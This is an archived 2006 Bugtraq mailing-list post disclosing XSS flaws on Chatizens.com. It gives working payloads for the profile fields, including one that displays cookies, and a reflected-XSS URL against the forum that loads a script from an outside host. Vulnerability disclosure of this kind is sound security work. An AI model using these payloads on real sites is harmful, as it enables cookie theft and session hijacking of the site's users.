| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060616000813.10203.qmail@securityfocus.com> Date: 16 Jun 2006 00:08:13 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Chatizens.com - XSS with cookie disclosure Chatizens.com Also known as Chattown.com Homepage: http://www.chatizens.com Affected files: * Profile input boxes: All input boxes of your profile. * Browsing the forums -------------------------------------------- XSS vuln with cookie disclosure via profile input boxes. To bypass chatizens filters of adding backslashes to ' and ", we use the long UFT-8 unicode of '. PoC: <img src=javascript:alert('XSS')> And to display our cookie: <IMG SRC=javascript:alert(document.cookie)> Screenshot: http://www.youfucktard.com/xsp/chatizen1.jpg http://www.youfucktard.com/xsp/chatizen2.jpg --------------------------------------------- heh, it seems chatizens.com is using a webapp I auditing before, Alstrasoft E-Friends. Screenshot: http://www.youfucktard.com/xsp/chatizen3.jpg ------------------------------------------- XSS vuln via viewing forum categories: http://chatizens.com/friends/index.php?mode=forums&act=viewcat&seid=19">">">'><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT><""><'<" Screenshot: http://www.youfucktard.com/xsp/chatizen4.jpg
Powered by blists - more mailing lists